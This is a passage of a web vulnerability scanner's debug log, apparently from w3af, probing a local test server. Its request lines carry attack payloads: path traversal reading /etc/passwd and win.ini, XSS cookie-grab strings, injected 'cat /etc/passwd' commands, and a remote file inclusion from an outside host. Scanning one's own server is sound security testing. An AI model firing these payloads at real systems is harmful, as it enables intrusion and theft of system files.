memory usage issues. The current GrepIn DiskDict size is 4430. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/horde/test.php returned HTTP code "404" (id=23063,from_cache=0,grep=1,rtt=0.08,did=RgXIlOpp) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/albums/userpics/Copperminer.jpg.php?cat /etc/passwd= returned HTTP code "404" (id=23062,from_cache=0,grep=1,rtt=0.08,did=1xp6ic4w) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~noaccess returned HTTP code "404" (id=23073,from_cache=0,grep=1,rtt=0.09,did=wMjLOpKz) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/servlet/org.apache.catalina.Globals/ returned HTTP code "404" (id=23074,from_cache=0,grep=1,rtt=0.08,did=KkGNo0go) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/dostuff.php?action=modify_user returned HTTP code "404" (id=23075,from_cache=0,grep=1,rtt=0.02,did=8HrdvHvN) [Wed Feb 12 10:04:27 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/ca/\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../\\\\windows/\\\\win.ini returned HTTP code "404" (id=23076,from_cache=0,grep=1,rtt=0.02,did=TFwnNSe8) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/nosuchurl/> returned HTTP code "404" (id=23065,from_cache=0,grep=1,rtt=0.13,did=ljqdWaha) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/a.jsp/ returned HTTP code "404" (id=23064,from_cache=0,grep=1,rtt=0.11,did=iywfbbpx) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/WS_FTP.ini returned HTTP code "404" (id=23061,from_cache=0,grep=1,rtt=0.15,did=fCeqqgCb) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~test returned HTTP code "404" (id=23072,from_cache=0,grep=1,rtt=0.22,did=tHgGuowX) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle= returned HTTP code "404" (id=23069,from_cache=0,grep=1,rtt=0.02,did=bEAg9Sz9) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/ca000007.pl?ACTION=SHOWCART&REFPAGE=\\"> returned HTTP code "404" (id=23070,from_cache=0,grep=1,rtt=0.04,did=Epxy3A2h) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/esp?PAGE=<=<=&script=>=>=&alert(document.cookie)=&/script= returned HTTP code "404" (id=23067,from_cache=0,grep=1,rtt=0.02,did=HYFtU1b1) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/msadm/user/login.php3?account_name=\\"> returned HTTP code "404" (id=23071,from_cache=0,grep=1,rtt=0.18,did=E744WfEO) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/.cobalt/alert/service.cgi?service= returned HTTP code "404" (id=23060,from_cache=0,grep=1,rtt=0.10,did=yT5CuhhN) [Wed Feb 12 10:04:27 2020 - debug] symfony.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] meta_generator.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] retirejs.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/webif.cgi returned HTTP code "404" (id=23068,from_cache=0,grep=1,rtt=0.03,did=myt2b8rk) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/chat/data/usr returned HTTP code "404" (id=23077,from_cache=0,grep=1,rtt=0.02,did=zhN6DhNE) [Wed Feb 12 10:04:27 2020 - debug] expect_ct.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] motw.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] svn_users.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] file_upload.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] private_ip.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4431. [Wed Feb 12 10:04:27 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:27 2020 - debug] serialized_object.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] blank_body.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] credit_cards.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] csp.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] dom_xss.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cfdocs/snippets/evaluate.cfm returned HTTP code "404" (id=23066,from_cache=0,grep=1,rtt=0.13,did=aXTinPEQ) [Wed Feb 12 10:04:27 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11816, 'reject-seen-url': 5588, 'reject-out-of-scope': 216, 'accept': 4830} [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4432. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4433. [Wed Feb 12 10:04:27 2020 - debug] Still have 1 unfinished tasks in CrawlInfraIn join() [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4434. [Wed Feb 12 10:04:27 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] clamav.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] keys.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] objects.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] error_500.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] meta_tags.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] password_profiling.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] click_jacking.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] lang.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] websockets_links.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] error_pages.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] strange_reason.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] cache_control.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] strange_headers.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] ssn.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] oracle.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] feeds.grep(uri="http://localhost:9090/in/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] url_session.grep(uri="http://localhost:9090/in/") took 0.02s to run [Wed Feb 12 10:04:27 2020 - debug] vulners_db.grep(uri="http://localhost:9090/in/") took 0.07s to run [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4435. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/Admin/ returned HTTP code "404" (id=23079,from_cache=0,grep=1,rtt=0.03,did=0brLyj9v) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/perl.exe returned HTTP code "404" (id=23081,from_cache=0,grep=1,rtt=0.10,did=OxTnFc23) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/mkplog.exe returned HTTP code "404" (id=23078,from_cache=0,grep=1,rtt=0.08,did=WtGtCeZN) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/shop/normal_html.cgi?file=<=<=&script=>=>=&alert(\\"Vulnerable\\")=&/script= returned HTTP code "404" (id=23082,from_cache=0,grep=1,rtt=0.07,did=IU2lMMMJ) [Wed Feb 12 10:04:27 2020 - debug] localhost:9090 connection pool stats (free:121 / in_use:2 / max:50 / total:123) [Wed Feb 12 10:04:27 2020 - debug] Connections with more in use time: (932ff3ed7e088c71, 0.03 sec) (38ae77659c2b85db, 0.02 sec) [Wed Feb 12 10:04:27 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/in/") took 0.11s to run [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/php-coolfile/action.php?action=edit&file=config.php returned HTTP code "404" (id=23083,from_cache=0,grep=1,rtt=0.17,did=SKginrT3) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/webmap.cgi returned HTTP code "404" (id=23085,from_cache=0,grep=1,rtt=0.08,did=6htssfSR) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/ returned HTTP code "404" (id=23080,from_cache=0,grep=1,rtt=0.14,did=4QeRCphT) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4436. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4437. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4437. [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/admin/setup.cgi returned HTTP code "404" (id=23084,from_cache=0,grep=1,rtt=0.03,did=xbNNddRJ) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4437. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4438. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin-sdb/printenv returned HTTP code "404" (id=23086,from_cache=0,grep=1,rtt=0.05,did=ej0AJTfY) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/catalog/includes/include_once.php?include_file=http://cirt.net/rfiinc.txt returned HTTP code "404" (id=23087,from_cache=0,grep=1,rtt=0.15,did=nqnaVSbN) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4439. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/Page/1,10966,,00.html?var= returned HTTP code "404" (id=23088,from_cache=0,grep=1,rtt=0.04,did=p4OKOVSG) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/formmail.cgi?recipient=root@localhost\ncat /etc/passwd&email=joeuser@localhost&subject=test returned HTTP code "404" (id=23089,from_cache=0,grep=1,rtt=0.13,did=g42xnuch) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/myinvoicer/config.inc returned HTTP code "404" (id=23090,from_cache=0,grep=1,rtt=0.04,did=WWNvAC8M) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/index.php?sql_debug=1 returned HTTP code "404" (id=23091,from_cache=0,grep=1,rtt=0.05,did=ZaKjUaGq) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/administrator/popups/sectionswindow.php?type=web&link=\\" returned HTTP code "404" (id=23092,from_cache=0,grep=1,rtt=0.12,did=5CJrIHNN) [Wed Feb 12 10:04:27 2020 - debug] symfony.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/DB4Web/10.10.10.10:100 returned HTTP code "404" (id=23094,from_cache=0,grep=1,rtt=0.14,did=eWdPaRNS) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/test-cgi?/*= returned HTTP code "404" (id=23095,from_cache=0,grep=1,rtt=0.05,did=UsoAiJca) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/erba/start/ returned HTTP code "404" (id=23096,from_cache=0,grep=1,rtt=0.03,did=ANfp7zpQ) [Wed Feb 12 10:04:27 2020 - debug] file_upload.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] expect_ct.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] svn_users.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] private_ip.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] motw.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] meta_generator.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] retirejs.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4440. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2142. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/modules.php?op=modload&name=Members_List&file=index&letter= returned HTTP code "404" (id=23093,from_cache=0,grep=1,rtt=0.06,did=duVdGg20) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/search.php?searchstring= returned HTTP code "404" (id=23097,from_cache=0,grep=1,rtt=0.06,did=w5LQmmBW) [Wed Feb 12 10:04:27 2020 - debug] localhost:9090 connection pool stats (free:109 / in_use:14 / max:50 / total:123) [Wed Feb 12 10:04:27 2020 - debug] Connections with more in use time: (6941a0a978ef0bd6, 0.21 sec) (ecece9365aff69d3, 0.20 sec) (b885566e5a990404, 0.15 sec) (932ff3ed7e088c71, 0.11 sec) (da10a070a7055986, 0.10 sec) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4441. [Wed Feb 12 10:04:27 2020 - debug] blank_body.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] credit_cards.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] websockets_links.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] csp.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] dom_xss.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:27 2020 - debug] serialized_object.grep(uri="http://localhost:9090/pics/") took 0.04s to run [Wed Feb 12 10:04:27 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] keys.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/c32web.exe/ChangeAdminPassword returned HTTP code "404" (id=23098,from_cache=0,grep=1,rtt=0.15,did=KToIhsks) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4442. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2143. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot= returned HTTP code "404" (id=23099,from_cache=0,grep=1,rtt=0.19,did=LW5KoQsN) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/vpasswd.cgi returned HTTP code "404" (id=23104,from_cache=0,grep=1,rtt=0.19,did=UTSohMM3) [Wed Feb 12 10:04:27 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11828, 'reject-seen-url': 5589, 'reject-out-of-scope': 216, 'accept': 4842} [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/com returned HTTP code "404" (id=23102,from_cache=0,grep=1,rtt=0.13,did=DoxlV6IQ) [Wed Feb 12 10:04:27 2020 - debug] clamav.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2144. [Wed Feb 12 10:04:27 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11828, 'reject-seen-url': 5589, 'reject-out-of-scope': 216, 'accept': 4842} [Wed Feb 12 10:04:27 2020 - debug] vulners_db.grep(uri="http://localhost:9090/pics/") took 0.13s to run [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/index.php/content/advancedsearch/?SearchText=&PhraseSearchText=&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search returned HTTP code "404" (id=23103,from_cache=0,grep=1,rtt=0.06,did=tRJCL2I5) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/servlet/org.apache.catalina.servlets.WebdavStatus/ returned HTTP code "404" (id=23108,from_cache=0,grep=1,rtt=0.12,did=AMwfwcsn) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/livehelp/ returned HTTP code "404" (id=23110,from_cache=0,grep=1,rtt=0.03,did=UzbCZKDT) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/admin.php?en_log_id=0&action=config returned HTTP code "404" (id=23111,from_cache=0,grep=1,rtt=0.22,did=GPZxChxG) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/ldap/cgi-bin/ldacgi.exe?Action= returned HTTP code "404" (id=23112,from_cache=0,grep=1,rtt=0.10,did=Cgb2Lgtu) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/comments.php?subject=&comment=&pid=0&sid=0&mode=&order=&thold=op=Preview returned HTTP code "404" (id=23105,from_cache=0,grep=1,rtt=0.14,did=kr2Yehcd) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~nobody returned HTTP code "404" (id=23109,from_cache=0,grep=1,rtt=0.10,did=KDxpQLq6) [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4443. [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/netpad.cgi returned HTTP code "404" (id=23114,from_cache=0,grep=1,rtt=0.22,did=icBZ0HsI) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/~/.aspx?aspxerrorpath=null returned HTTP code "404" (id=23106,from_cache=0,grep=1,rtt=0.08,did=Hxqx95q5) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/?sql_debug=1 returned HTTP code "302" (id=23100,from_cache=0,grep=1,rtt=0.08,did=ErwmzR8U) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/isapi/count.pl returned HTTP code "404" (id=23107,from_cache=0,grep=1,rtt=0.13,did=eZ7I6OL8) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/perl returned HTTP code "404" (id=23113,from_cache=0,grep=1,rtt=0.14,did=J1AA7geP) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/Program Files/ returned HTTP code "404" (id=23115,from_cache=0,grep=1,rtt=0.13,did=MCgbx2p9) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/scripts/wsisa.dll/WService=anything?WSMadmin= returned HTTP code "404" (id=23117,from_cache=0,grep=1,rtt=0.02,did=y2GMS9rF) [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2145. [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd returned HTTP code "404" (id=23120,from_cache=0,grep=1,rtt=0.12,did=DN0Ize7R) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/msadm/site/index.php3?authid=\\"> returned HTTP code "404" (id=23116,from_cache=0,grep=1,rtt=0.04,did=9TZBUd5K) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/ca000001.pl?ACTION=SHOWCART&hop=\\">&PATH=acatalog/ returned HTTP code "404" (id=23119,from_cache=0,grep=1,rtt=0.13,did=oPFoMwbG) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/orders/orders.txt returned HTTP code "404" (id=23118,from_cache=0,grep=1,rtt=0.32,did=eXYiP34h) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cfide/Administrator/startstop.html returned HTTP code "404" (id=23124,from_cache=0,grep=1,rtt=0.05,did=5djYD4de) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/error/500error.jsp?et=1 returned HTTP code "404" (id=23125,from_cache=0,grep=1,rtt=0.04,did=UkGdUGGn) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/?mod=&op=browse returned HTTP code "302" (id=23121,from_cache=0,grep=1,rtt=0.06,did=lp3q3U3m) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/cgi-bin/campas?\ncat\n/etc/passwd\n= returned HTTP code "404" (id=23123,from_cache=0,grep=1,rtt=0.17,did=nx0wDDEG) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/autohtml.php?op=modload&mainfile=x&name=/etc/passwd returned HTTP code "404" (id=23126,from_cache=0,grep=1,rtt=0.15,did=9xgfJB9h) [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4444. [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~unknown returned HTTP code "404" (id=23122,from_cache=0,grep=1,rtt=0.04,did=p6dgEuKN) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/ca/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\/\\\\etc/\\\\passwd returned HTTP code "404" (id=23127,from_cache=0,grep=1,rtt=0.14,did=tRepQPWu) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/cgi-bin/wwwwais returned HTTP code "404" (id=23128,from_cache=0,grep=1,rtt=0.09,did=KD3vFpbA) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/mt-static/mt-load.cgi returned HTTP code "404" (id=23130,from_cache=0,grep=1,rtt=0.11,did=RdDP2dZq) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/_vti_txt/_vti_cnf/ returned HTTP code "404" (id=23131,from_cache=0,grep=1,rtt=0.19,did=p57wHszi) [Wed Feb 12 10:04:28 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2146. [Wed Feb 12 10:04:28 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] objects.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] error_500.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] meta_tags.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] password_profiling.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] click_jacking.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] lang.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] url_session.grep(uri="http://localhost:9090/pics/") took 0.05s to run [Wed Feb 12 10:04:28 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/pics/") took 0.00s to run [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/test.php?=x returned HTTP code "404" (id=23132,from_cache=0,grep=1,rtt=0.09,did=zUpMx53k) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/view-source?view-source= returned HTTP code "404" (id=23133,from_cache=0,grep=1,rtt=0.16,did=Uy4RT9gJ) [Wed Feb 12 10:04:28 2020 - debug] HEAD http://localhost:9090/cgi-bin/ImageFolio/admin/admin.cgi returned HTTP code "404" (id=23134,from_cache=0,grep=1,rtt=0.11,did=F0a8V1JG) [Wed Feb 12 10:04:28 2020 - debug] GET http://localhost:9090/_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx= returned HTTP code "404" (id=23129,from_cache=0,grep=1,rtt=0.06,did=fvoaiEzN) [Wed Feb 12 10:04:28 2020 - debug] GET 